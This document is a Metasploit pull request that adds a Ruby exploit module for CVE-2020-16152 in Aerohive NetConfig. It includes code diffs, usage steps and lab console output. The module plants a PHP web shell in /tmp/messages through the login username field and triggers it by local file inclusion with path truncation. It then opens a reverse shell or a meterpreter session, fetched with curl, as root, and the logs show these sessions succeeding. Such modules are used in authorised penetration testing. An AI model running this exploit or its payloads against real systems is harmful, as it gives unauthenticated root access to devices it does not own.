+          issue in conjunction with log poisoning to gain RCE as root.
+
+          This module has been successfully tested against Aerohive NetConfig
+          version 10.0r7a.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'Erik de Jong', # github.com/eriknl - discovery
+          'Erik Wynter' # @wyntererik - Metasploit'
+        ],
+        'References' => [
+          ['CVE', '2020-16152'], # still categorized as RESERVED
+          ['URL', 'https://github.com/eriknl/CVE-2020-16152'] # analysis and PoC code
+        ],
+        'DefaultOptions' => {
+          'SSL' => true,
+          'RPORT' => 443,
+          'PAYLOAD' => 'cmd/unix/reverse_openssl' # this may be the only payload that works
+        },
+        'Platform' => %w[unix],
+        'Arch' => ARCH_CMD,
+        'Privileged' => true,
+        'DisclosureDate' => '2020-02-17',
+        'Targets' => [ ['CMD', {}], ],
+        'DefaultTarget' => 0,
+        'Notes' => {
+          'Stability' => [ CRASH_SAFE ],
+          'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ],
+          'Reliability' => [ REPEATABLE_SESSION ]
+        }
+      )
+    )
+
+    register_options [
+      OptString.new('TARGETURI', [true, 'The base path to Aerohive NetConfig', '/']),
+    ]
+  end
+
+  def check
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'index.php5')
+    })
+
+    unless res
+      return CheckCode::Unknown('Connection failed.')
+    end
+
+    unless res.code == 200 && res.body.include?('Aerohive NetConfig UI')
+      return CheckCode::Safe('Target is not an Aerohive NetConfig application.')
+    end
+
+    version = res.body.scan(/action="login\.php5\?version=(.*?)"/)&.flatten&.first
+    unless version
+      return CheckCode::Detected('Could not determine Aerohive NetConfig version.')
+    end
+
+    begin
+      if Rex::Version.new(version) <= Rex::Version.new('10.0r8a')
+        return CheckCode::Appears("The target is Aerohive NetConfig version #{version}")
+      else
+        return CheckCode::Safe("The target is Aerohive NetConfig version #{version}")
+      end
+    rescue StandardError => e
+      return CheckCode::Unknown("Failed to obtain a valid Aerohive NetConfig version: #{e}")
+    end
+  end
+
+  def poison_log
+    password = rand_text_alphanumeric(8..12)
+    @shell_cmd_name = rand_text_alphanumeric(3..6)
+    @poison_cmd = "<?php system($_POST['#{@shell_cmd_name}']);?>"
+
+    # Poison /tmp/messages
+    print_status('Attempting to poison the log at /tmp/messages...')
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'login.php5'),
+      'vars_post' => {
+        'login_auth' => 0,
+        'miniHiveUI' => 1,
+        'authselect' => 'Name/Password',
+        'userName' => @poison_cmd,
+        'password' => password
+      }
+    })
+
+    unless res
+      fail_with(Failure::Disconnected, 'Connection failed while trying to poison the log at /tmp/messages')
+    end
+
+    unless res.code == 200 && res.body.include?('cmn/redirectLogin.php5?ERROR_TYPE=MQ==')
+      fail_with(Failure::UnexpectedReply, 'Unexpected response received while trying to poison the log at /tmp/messages')
+    end
+
+    print_status('Server responded as expected. Continuing...')
+  end
+
+  def exploit
+    poison_log
+    print_status('Attempting to execute the payload')
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'action.php5'),
+      'vars_get' => {
+        '_action' => 'list',
+        'debug' => 'true'
+      },
+      'vars_post' => {
+        '_page' => 'a' + '/..' * 8 + '/' * 4041 + '/tmp/messages',  # Trigger LFI through path truncation
+        @shell_cmd_name => payload.encoded
+      }
+    })
+
+    unless res
+      fail_with(Failure::Disconnected, 'Connection failed while trying to execute the payload')
+    end
+
+    unless res.code == 200 && res.body.include?('/tmp/messages')
+      fail_with(Failure::UnexpectedReply, 'Unexpected response received while trying to execute the payload')
+    end
+
+    print_warning('In case of successful exploitation, this module requires manual cleanup of the log file at /tmp/messages')
+    print_warning("Deleting this file may break the application, so it's advised to manually remove the line containing the poison command:\n\t#{@poison_cmd}")
+  end
+end

--- a/modules/exploits/unix/webapp/aerohive_netconfig_lfi_log_poison_rce.rb
+++ b/modules/exploits/unix/webapp/aerohive_netconfig_lfi_log_poison_rce.rb
@@ -83,6 +83,7 @@ class MetasploitModule < Msf::Exploit::Remote
       if Rex::Version.new(version) <= Rex::Version.new('10.0r8a')
         return CheckCode::Appears("The target is Aerohive NetConfig version #{version}")
       else
+        print_warning('It should be noted that it is unclear if/when this issue was patched, so versions after 10.0r8a may still be vulnerable.')
         return CheckCode::Safe("The target is Aerohive NetConfig version #{version}")
       end
     rescue StandardError => e

--- a/modules/exploits/unix/webapp/aerohive_netconfig_lfi_log_poison_rce.rb
+++ b/modules/exploits/unix/webapp/aerohive_netconfig_lfi_log_poison_rce.rb
@@ -7,6 +7,7 @@ class MetasploitModule < Msf::Exploit::Remote
   Rank = ExcellentRanking
 
   include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::CmdStager
   prepend Msf::Exploit::Remote::AutoCheck
 
   def initialize(info = {})
@@ -38,14 +39,33 @@ class MetasploitModule < Msf::Exploit::Remote
         ],
         'DefaultOptions' => {
           'SSL' => true,
-          'RPORT' => 443,
-          'PAYLOAD' => 'cmd/unix/reverse_openssl' # this may be the only payload that works
+          'RPORT' => 443
         },
-        'Platform' => %w[unix],
-        'Arch' => ARCH_CMD,
+        'Platform' => %w[linux unix],
+        'Arch' => [ ARCH_ARMLE, ARCH_CMD ],
+        'Targets' => [
+          [
+            'Linux', {
+              'Arch' => [ARCH_ARMLE],
+              'Platform' => 'linux',
+              'DefaultOptions' => {
+                'PAYLOAD' => 'linux/armle/meterpreter/reverse_tcp',
+                'CMDSTAGER::FLAVOR' => 'curl'
+              }
+            }
+          ],
+          [
+            'CMD', {
+              'Arch' => [ARCH_CMD],
+              'Platform' => 'unix',
+              'DefaultOptions' => {
+                'PAYLOAD' => 'cmd/unix/reverse_openssl' # this may be the only payload that works'
+              }
+            }
+          ]
+        ],
         'Privileged' => true,
         'DisclosureDate' => '2020-02-17',
-        'Targets' => [ ['CMD', {}], ],
         'DefaultTarget' => 0,
         'Notes' => {
           'Stability' => [ CRASH_SAFE ],
@@ -121,10 +141,9 @@ class MetasploitModule < Msf::Exploit::Remote
     print_status('Server responded as expected. Continuing...')
   end
 
-  def exploit
-    poison_log
+  def execute_command(cmd, _opts = {})
     print_status('Attempting to execute the payload')
-    res = send_request_cgi({
+    send_request_cgi({
       'method' => 'POST',
       'uri' => normalize_uri(target_uri.path, 'action.php5'),
       'vars_get' => {
@@ -133,19 +152,21 @@ class MetasploitModule < Msf::Exploit::Remote
       },
       'vars_post' => {
         '_page' => 'a' + '/..' * 8 + '/' * 4041 + '/tmp/messages',  # Trigger LFI through path truncation
-        @shell_cmd_name => payload.encoded
+        @shell_cmd_name => cmd
       }
-    })
-
-    unless res
-      fail_with(Failure::Disconnected, 'Connection failed while trying to execute the payload')
-    end
-
-    unless res.code == 200 && res.body.include?('/tmp/messages')
-      fail_with(Failure::UnexpectedReply, 'Unexpected response received while trying to execute the payload')
-    end
+    }, 0)
 
     print_warning('In case of successful exploitation, this module requires manual cleanup of the log file at /tmp/messages')
     print_warning("Deleting this file may break the application, so it's advised to manually remove the line containing the poison command:\n\t#{@poison_cmd}")
+  end
+
+  def exploit
+    poison_log
+    if target.arch.first == ARCH_CMD
+      print_status('Executing the payload')
+      execute_command(payload.encoded)
+    else
+      execute_cmdstager(background: true)
+    end
   end
 end


### PR DESCRIPTION
## About
This change adds a new exploit module to `exploit/unix/webapp/aerohive_netconfig_lfi_log_poison_rce`. The module exploits LFI and log poisoning vulnerabilities (CVE-2020-16152) in Aerohive NetConfig, version 10.0r8a build-242466 and older in order to achieve unauthenticated remote code execution as the root user. This change also adds documentation for the module.

## Vulnerable system
Aerohive NetConfig, version 10.0r8a build-242466 and older. The [original writeup](https://github.com/eriknl/CVE-2020-16152) notes that it is unclear if/when this issue was patched, so versions after 10.0r8a may still be vulnerable. Disclosure to the vendor occurred in early 2020 and while the vendor confirmed the problem, they failed to inform the researcher about the timeline for fixing it. As a result, the researcher ultimately released the details and PoC on their own in  September of last year. As of now, the CVE status is still `RESERVED`. This module has been successfully tested against Aerohive NetConfig version 10.0r7a.

## Verification Steps
1. Start msfconsole
2. Do: `use exploit/unix/webapp/aerohive_netconfig_lfi_log_poison_rce`
3. Do: `set RHOSTS [IP]`
4. Do: `set LHOST [IP]`
5. Do: `exploit`

## Options
### TARGETURI
The base path to Aerohive NetConfig. The default value is `/`.

## Targets
```
Id  Name
--  ----
0   Linux
1   CMD
```

## Scenarios
### Aerohive NetConfig 10.0r7a - Linux target
```
Module options (exploit/unix/webapp/aerohive_netconfig_lfi_log_poison_rce):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     192.168.1.39     yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki
                                         /Using-Metasploit
   RPORT      443              yes       The target port (TCP)
   SRVHOST    0.0.0.0          yes       The local host or network interface to listen on. This must be an address o
                                         n the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT    8080             yes       The local port to listen on.
   SSL        true             no        Negotiate SSL/TLS for outgoing connections
   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI  /                yes       The base path to Aerohive NetConfig
   URIPATH                     no        The URI to use for this exploit (default is random)
   VHOST                       no        HTTP server virtual host


Payload options (linux/armle/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.1.66     yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Linux


msf6 exploit(unix/webapp/aerohive_netconfig_lfi_log_poison_rce) > run

[*] Started reverse TCP handler on 192.168.1.66:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. The target is Aerohive NetConfig version 10.0r7a
[*] Attempting to poison the log at /tmp/messages...
[*] Server responded as expected. Continuing...
[*] Using URL: http://0.0.0.0:8080/PVqYZ0a
[*] Local IP: http://192.168.1.66:8080/PVqYZ0a
[*] Attempting to execute the payload
[!] In case of successful exploitation, this module requires manual cleanup of the log file at /tmp/messages
[!] Deleting this file may break the application, so it's advised to manually remove the line containing the poison command:
        <?php system($_POST['PD3C']);?>
[*] Command Stager progress - 100.00% done (112/112 bytes)
[*] Client 192.168.1.39 (curl/7.50.1) requested /PVqYZ0a
[*] Sending payload to 192.168.1.39 (curl/7.50.1)
[*] Sending stage (902256 bytes) to 192.168.1.39
[*] Meterpreter session 1 opened (192.168.1.66:4444 -> 192.168.1.39:39216) at 2021-09-23 22:07:56 +0000
[*] Server stopped.

meterpreter > getuid
Server username: root @ AH-5fb7c0 (uid=0, gid=0, euid=0, egid=0)
meterpreter > sysinfo
Computer     : 192.168.1.39
OS           :  (Linux 3.16.36)
Architecture : armv7l
BuildTuple   : armv5l-linux-musleabi
Meterpreter  : armle/linux
```

### Aerohive NetConfig 10.0r7a - CMD target
```
msf6 exploit(unix/webapp/aerohive_netconfig_lfi_log_poison_rce) > show options

Module options (exploit/unix/webapp/aerohive_netconfig_lfi_log_poison_rce):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     192.168.1.39     yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   RPORT      443              yes       The target port (TCP)
   SSL        true             no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                yes       The base path to Aerohive NetConfig
   VHOST                       no        HTTP server virtual host


Payload options (cmd/unix/reverse_openssl):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.1.66     yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   CMD


msf6 exploit(unix/webapp/aerohive_netconfig_lfi_log_poison_rce) > exploit

[*] Started reverse double SSL handler on 192.168.1.66:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. The target is Aerohive NetConfig version 10.0r7a
[*] Attempting to poison the log at /tmp/messages...
[*] Server responded as expected. Continuing...
[*] Attempting to execute the payload
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[!] In case of successful exploitation, this module requires manual cleanup of the log file at /tmp/messages
[!] Deleting this file may break the application, so it's advised to manually remove the line containing the poison command:
        <?php system($_POST['TEVwXm']);?>
[*] Command: echo rVKzZFZ3xozDeyYd;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "rVKzZFZ3xozDeyYd\n"
[*] Matching...
[*] A is input...
[*] Command shell session 8 opened (192.168.1.66:4444 -> 192.168.1.39:39029) at 2021-09-22 23:07:51 +0000

id
uid=0(root) gid=0(root)
```